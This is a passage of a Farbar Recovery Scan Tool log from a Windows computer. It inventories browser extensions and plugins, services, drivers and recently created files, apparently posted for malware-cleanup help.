FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-19]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-11-18]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 asg68x4e; C:\Windows\System32\Drivers\asg68x4e.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 01:52 - 2019-11-19 01:57 - 000046092 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-19 01:50 - 2019-11-19 01:50 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:50 - 2019-11-19 01:50 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:41 - 2019-11-19 01:42 - 000017528 _____ C:\Users\Vladana\Desktop\Fixlog.txt
2019-11-19 01:39 - 2019-11-19 01:39 - 000000000 ____D C:\Users\Vladana\Desktop\Old
2019-11-18 21:23 - 2019-11-18 21:23 - 000001001 _____ C:\Users\Vladana\Desktop\iPool.lnk
2019-11-18 14:24 - 2019-11-19 01:55 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 16:40 - 2019-11-18 19:26 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-18 01:34 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-18 01:34 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
